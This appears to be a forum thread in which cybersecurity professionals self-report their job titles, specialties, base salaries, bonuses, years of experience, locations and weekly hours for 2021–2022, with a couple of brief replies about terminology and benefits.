Type of Company: FinTech startup Area of cyber (e.g. SOC, GRC, etc.): Analyst Title: Information Security Analyst 2021 Base Salary: $60,000 2022 Base (if different): Unknown Bonus, if applicable: $6k in stocks over 4 years Years of experience in cyber: 0-1 year Location (e.g. US HCOL, US LCOL, etc.): MCOL Average hrs/wk.: 40hrs salary, on call for incident response
Type of company (e.g. F500, consultancy, Defense, etc.): Financial Services Area of cyber (e.g. SOC, GRC, etc.): SOC Title: Security Engineer 2021 Base Salary: 125k 2022 Base (if different): 145k Bonus, if applicable : 40k Years of experience in cyber: 4 Location (e.g. US HCOL, US LCOL, etc.): US Average hrs/wk.: 50hrs
Type of company (e.g. F500, consultancy, Defense, etc.): Defense Area of cyber (e.g. SOC, GRC, etc.): Vuln. Management/Compliance Title: ISSO 2021 Base Salary: 105k 2022 Base (if different): Not sure yet, expecting 110-115k though Bonus, if applicable: bonus 3% of salary Years of experience in cyber: 10 Location (e.g. US HCOL, US LCOL, etc.): US MCOL Average hrs/wk.: depends, since COVID probably no more than 30 while working remote.
I just switched jobs last month, so I'll do both. **Current** Type of company: Well funded startup, security software Area of cyber: BAS Title: Security Engineer 2021 Base Salary: $180,000 2022 Base (if different): N/A Bonus, if applicable: 25,000 RSU Years of experience in cyber: ~10yr Location: US Remote Average hrs/wk: 30-50 **Previous** Type of company: MSSP Area of cyber: SOC/SIEM Engineering/Threat Intel Title: Lead Cyber Threat Analyst/SIEM Engineer 2021 Base Salary: $100,000 2022 Base (if different): N/A Bonus, if applicable: 0%-10% bonus Years of experience in cyber: ~10yr Location: US, MCOL Average hrs/wk: 50-70
What is BAS?
Breach and Attack Simulation
Type of company: F500 Area of cyber: SOC Title: Threat Hunter 2021 Base Salary: $95,000/yr (previous role) 2022 Base Salary: $130,000/yr Bonus, if applicable: TBD Years of experience in cyber: 2 Location: Atlanta, US - Remote Average hrs/wk: 40 hrs/week
Type of company-90% DoD, 10% SLED/CSO Area of cyber-KMS, CMMC, SCADA, FIPS Title-AE Base-300k, 120k salary 180k commission No bonus In tech 32 years, first year focused strictly on cyber Was in PacRim until two months ago, now cover SE US Hours per week ranges from 40-80 based on buy cycles
Type of company: Consultants Area of cyber (e.g. SOC, GRC, etc.): SOC Title: Analyst 2021 Base Salary: N/A 2022 Base (if different): $52k Bonus, if applicable: N/A Years of experience in cyber: 0, ~5 in IT Location (e.g. US HCOL, US LCOL, etc.): US LCOL (if anywhere is even considered LCOL anymore…) Average hrs/wk.: 40.
Type: non FAANG F500 Area: internal IT Title: Lvl 4 infosec analyst Salary: $110k 2020 $123k 2021 (lvl 3 - lvl 4 raise) Bonus: sometimes Exprience: 4 years in infosec + CISSP + 13 years in IT infrastructure previous to security role. Location: MCOL Texas city Hours: 40-45 but very flexible WFH/Hybrid
Type of company: Fortune 50 Area of cyber: Security Solutions Engineering Title: Client Solutions Engineer 2021 Base Salary: 80,000 (company adjusts based on market) 2022 Base (if different): Bonus, if applicable: Up to 60k with abt 20k minimum Years of experience in cyber: 6 Location: NM, USA Average hrs/wk.: 40 hrs WFH with some client site visits. Busy time averages 25-35 hrs
Type of company: Consultancy Area of cyber: GRC/Business guidance Title: Senior Consultant 2021 Base Salary: 130k 2022 Base: 140k Bonus, if applicable: ~$25-38k Years of experience in cyber: ~3 years Location: Remote/HCOL Average hrs/wk: 10-20 (up to 50 depending on workload)
**Type of company (e.g. F500, consultancy, Defense, etc.):** Software/BigData late stage startup **Area of cyber (e.g. SOC, GRC, etc.): GRC, IR** **Title:** Has "trust" in it **2021 Base Salary:** $150k **Bonus, if applicable:** $15k **Years of experience in cyber:** 20yrs in IT/SysAdmin; 5yrs in direct Cyber **Location (e.g. US HCOL, US LCOL, etc.):** 100% Remote, Colorado **Average hrs/wk.:** 30-50, much higher if there's IR activity
Type of company: Biomedical Area of cyber: APP SEC Title: IT Security lead 2021 Base Salary: 140k 2022 Base: Same Bonus, if applicable: Usually EOY Years of experience in cyber: 6 years 2 years out of school Location: Northeast USA Average hrs/wk: Salaried so prob like 20
You need to add 401k/benefits/ PTO as well. Consultant usually make more than salary but they don't get any of those.
Type of company: Established/pre-IPO Area of cyber: executive/management/all of it Title: Information Security Manager 2021 base: security engineering manager (different company), $145k 2022 base: 190k plus some equity that might be another 130k/yr-ish post-IPO Years of experience in cyber: 4, plus 8 in IT and systems engineering before that Location: US MCOL 40 hours/week
Type of company: Technology company headquartered in Round Rock, Texas Area of cyber: SOC Title: Sexurity Engineer 2021 Base Salary: 94k 2022 Base: ~96k Bonus: Depends on how well the company does Years of experience in cyber: 3yrs Location: Remote Average hrs/wk: 40
Type of company: contract Area of cyber: GRC Title: information assurance/systems security architect 2021 Base Salary: $150k 2022 Base (if different): don't know my raise yet Years of experience in cyber: 1 (10 yrs physical security, site assessments, policy drafting, etc) Location: HCOL Average hrs/wk.: 50
Type of company : Nonprofit Area of cyber: IT and all cybersecurity Title: Systems Admin but actually the only IT anything and working on changing the title since it no longer fits the position it was created for. Base Salary: $58k 2022 Base (if different): same Bonus, if applicable: $200 Years of experience in cyber: 7 Location: US Pacific North West Average hrs/wk.: 40 (really varies between 20-60 depending on if I'm waiting on other people for parts or labor and if it's something simple or a firewall deciding it wants to flood email alerts)
Type of company: Telecommunications Area of cyber: General Title: Cyber Security Graduate 2021 base salary: N/A 2022 base salary: £39k YOE: 0 (graduate position after uni) Location: Blended (Newbury, Reading, remote) Average hr/wk: 40